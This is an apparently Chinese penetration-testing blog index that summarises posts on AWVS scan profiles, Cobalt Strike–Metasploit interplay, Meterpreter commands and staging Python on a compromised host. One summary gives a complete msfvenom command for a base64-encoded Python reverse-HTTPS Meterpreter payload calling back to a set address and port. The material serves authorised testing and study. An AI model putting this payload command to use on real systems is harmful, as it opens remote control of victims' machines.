2020年10月26日

AWVS13扫描类型profile_id对照表

摘要: 类型 值 含义 Full Scan 11111111-1111-1111-1111-111111111111 完全扫描(来自国光) High Risk Vulnerabilities 11111111-1111-1111-1111-111111111112 高风险漏洞(来自国光) Cross-sit 阅读全文

posted @ 2020-10-26 22:41 thisismynickname 阅读(540) 评论(0) 推荐(0) 编辑

2020年7月15日

Cobalt Strike 和 Metasploit Framework 联动

摘要: 文章来源:https://blog.cobaltstrike.com/2016/01/05/interoperability-with-the-metasploit-framework/ MSF通过漏洞利用使得CS获得shell: use exploit/multi/browser/adobe_fl 阅读全文

posted @ 2020-07-15 10:44 thisismynickname 阅读(287) 评论(0) 推荐(0) 编辑

2020年4月9日

msf常用命令

摘要: 来源:https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/ 简单无需记录的命令: help、background 、cat、cd、pwd、download、upload、edit getuid、ipco 阅读全文

posted @ 2020-04-09 12:46 thisismynickname 阅读(286) 评论(0) 推荐(0) 编辑

2020年4月8日

上传嵌入式python环境进行渗透测试

摘要: 1.Python官网下载嵌入式环境 2。下载7z命令行版本,下载之后,复制【7za.exe】即可 3。上传Python嵌入式环境压缩包到目标机 4. 上传命令行版本的7z程序到目标机 5. 利用7z解压,命令是:【 .\7za.exe x .\python-3.5.0-embed-amd64.zip 阅读全文

posted @ 2020-04-08 23:59 thisismynickname 阅读(251) 评论(0) 推荐(0) 编辑

获取msf中的python代码

摘要: 命令: msfvenom -p python/meterpreter/reverse_https LHOST=192.168.0.113 LPORT=4444 --platform python -o https.py --encrypt base64 第一步:获得base64代码 第二部:解码 第 阅读全文

posted @ 2020-04-08 17:06 thisismynickname 阅读(241) 评论(0) 推荐(0) 编辑

导航